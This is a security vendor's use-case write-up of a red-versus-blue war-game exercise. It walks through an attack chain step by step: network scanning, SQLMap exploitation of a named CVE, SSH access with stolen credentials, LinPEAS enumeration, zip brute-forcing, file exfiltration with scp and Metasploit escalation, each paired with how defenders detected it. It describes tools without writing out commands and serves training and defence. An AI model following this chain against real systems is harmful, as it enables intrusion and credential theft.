CERTUse case

USE CASE: Blitz WarGames

This use case is a summary of the Blitz WarGames, which was organized during the TEHTRIS week in France.

We partnered with Whaller to provide a French sovereign platform to our players so that they could work together as teams all throughout the day.

About the event:

In a full remote exercise, a cyber warfare was simulated between a Red team (attackers) and a Blue team (defenders) during the day. The asynchronous nature of the exercise aimed at dedicating a full morning to the attackers (without interruption from the Red team) and allowing the Blue team to work on forensics investigation in the afternoon.

4 Red team players faced 7 Blue team players helped by the TEHTRIS Purple team on the 14th of June 2023.

Partnership with Whaller

To include players from different entities and ensure a smooth communication throughout the event, TEHTRIS partnered with Whaller, a French company which shares TEHTRIS’ ethics and values. Whaller was the first company to get the « Sovereign Solution » (Privacy Tech) label that certifies French software editors carrying about data protection.

We thank again our partner for this opportunity to play with them!

In the attackers’ shoes…

The Red team stumbles upon a message that was recently posted on the dark web and sees an opportunity to make money…

Calling for assistance!

Our blue team is alerted after the client noticed suspicious activities on the XDR Platform: as an incident response team, they are to investigate…

The infrastructure of the Blitz WarGames: the victim company’s network

The WebApp was set to a detection-only configuration, while the targeted Windows was set to remediation mode. This was to illustrate how configuration settings are vital while deploying cybersecurity tools on an infrastructure.

Unfolding the Blitz WarGames following the cyber kill chain

Reconnaissance (TA0043)

Scanning tools

The Red team used several scanning tools to gather information to support further targeting, such as Nmap (Network Mapper), an open-source tool for network discovery that can be used to identify hosts in the network and the ports that are opened in the systems found, Fuzz Faster U Fool (FFUF), a web fuzzer, or Nikto, a popular web server vulnerability scanner that can find vulnerabilities and list the CVE associated of those vulnerabilities.

With nmap, they found 3 hosts with open ports.

Getting distracted… by honeypots!

These scans gave information on TEHTRIS Deceptive Response, a honeypot set up to distract attackers and act as an early alarm system for cybersecurity analysts. And it worked like a charm!

The Red team lost time investigating the honeypot, which strengthened the signals for the blue team : an access to a decoy should always be investigated.

The purple team finally intervened to guide them through the exercise:

Purple team message on Whaller for the Red team : “Dark Soldier has a source… It seems like a neglected cmaps website is hosted on one of the machines…”

Back to business!

Once back on track and focusing on the right host, the Red team found the version of the website:

… and found that it was vulnerable to CVE-2023-29809, a SQL injection vulnerability allowing attackers to execute arbitrary code.

Blue team’s perspective

On the Blue team’s side, the honeypots played their role perfectly and acted as an early alarm:

Blue team message on Whaller:
NB : “FYI, while checking logs of the Deceptive Response, I probably identified a port scan on 10.2.8.8 from IP source 10.2.8.2 (possibly an attacker’s IP)”
TP : “Use of Nikto at 10:50AM from IP 10.2.8.2 towards 10.2.8.8 captured by the honeypot”

Network scanning by Nmap and Fuzz Faster U Fool, and webserver vulnerability scanner Nikto were detected by TEHTRIS NTA:

TEHTRIS XDR Platform – NTA alerts

Initial Access (TA001)

Exploit of CVE-2023-29809

The Red team exploited the SQL injection vulnerability (T1190) using SQLMap (popular tool that automates the process of detecting and exploiting SQL injection).

This allowed them to gain access to the users table stored in the website’s database and access credentials…

… to establish a SSH connection on the victim’s Linux server.

Incident response team: where to start?

Remember that the Blue team was called to face an emergency from a third party: in this scenario, they do not know what the infrastructure is like and what potential vulnerabilities exist.

Therefore, they decided to check on the common attack to a web server such as SQL injection, cross-site scripting (XSS) vulnerability and Local File Intrusion (LFI).

An SQL injection was detected by TEHTRIS NTA.

TEHTRIS XDR Platform
TEHTRIS XDR Platform

The SSH connection is visible in TEHTRIS SIEM, giving the Blue team information on the user victorh through which the attackers gained a foothold on the server:

Discovery (TA0007) & Credential Access (TA0006)

Gaining information on the environment…

Once on the Linux server, the red team used LinPEAS to try and escalate privilege. Then, navigating on victorh’s session, the Red team found the file admin.zip in the path /home/webadmin/.admin/admin.zip.

Red team on Whaller : « I see a webadmin user on the machine. victorh@ -ubuntu2204:/home/.admin$ is admin.zip”

They bruteforced the zip file to reveal admin.txt.

…Spotted by the Blue team

The Blue team found in the Raw Data of TEHTRIS NTA that some events indicated file transfers of a bash script called linpeas.sh using the utility wget on the port 8000.

TEHTRIS XDR Platform

TEHTRIS EDR raised alerts on the commandlines used by LinPEAS:

TEHTRIS XDR Platform

The Blue team saw that the users run the command group, probably to see if he belongs to the sudoers. The Blue team believed that the command find shows that victorh user does not have access to many folders of the system.

Then, the Blue team monitored some scp commands and cp commands to extract the file admin.zip to the attacker’s system.

TEHTRIS XDR Platform

Lateral movement (TA008) and Privilege Escalation (TA004) attempt

Targeting the Windows machine

Inside the admin.txt file, the Red team found credentials for a Windows machine (whose IP address had been identified prior with the nmap scan):

Once on the Windows, the Red team used Metasploit to escalate privilege in the hope of completing the mission. However, they could not go further.

Automatic remediation by TEHTRIS EPP

TEHTRIS EPP automatically killed Metasploit:

TEHTRIS XDR Platform – EPP alert

With TEHTRIS NTA, the Blue team spotted that the attackers used the Python module SimpleHTTP to transfer the file.

TEHTRIS XDR Platform – NTA alert

Conclusions

The Red team did not succeed in retrieving the secret Dark Soldier asked for!

  My first is a body part that is said to mirror the heart
  My second is a definite article (most frequently used)
  My third is the number one in the country of tehtris
  My fourth is in appreciation but not in association
  My fifth is plural latin for words of wisdom
  My last is french slang for money
  The answer is what drives tehtris
The sensitive file placed on the Windows to finish the mission

Still, we learned here valuable lessons…

On the one hand, the first phase of the attack illustrated just how useful honeypots are. Acting like pre-alarms that result in no false positives, they are a considerable help for Blue teamers while identifying attackers. TEHTRIS set up a research program to monitor Internet background noise and identify trends among threat actors: find out more here.

On the other hand, the scenario shows the importance of correctly setting up cybersecurity tools depending on the environment. The methodology to fine tune one’s configuration to enhance the XDR’s remediation capabilities is of critical importance.

TEHTRIS solutions protect against different type of threats and plays an active role in keeping sensitive data safe. The variety of tools help monitor all types of IT networks, set-up according to different parameters and constraints, while reducing attack surface.

Feedback from the players

L’évènement était top! Hâte de voir le prochain event 🙂
(The event was great ! Can’t wait to see the next one :))

SOC Engineer – POST Group

Hâte de participer au suivant 😉
(Can’t wait to play in the next event ;))        

Cybersecurity Consultant – TEHTRIS

Join us for the next WarGames

At TEHTRIS, we believe CTF-like events are both educational and informative. By impersonating threat actors and practicing investigation on a real attack, we can all benefit from each other’s expertise while having fun!

You are one of our partners or clients and you would like to participate in a WarGames exercise this year? Please contact us for more information!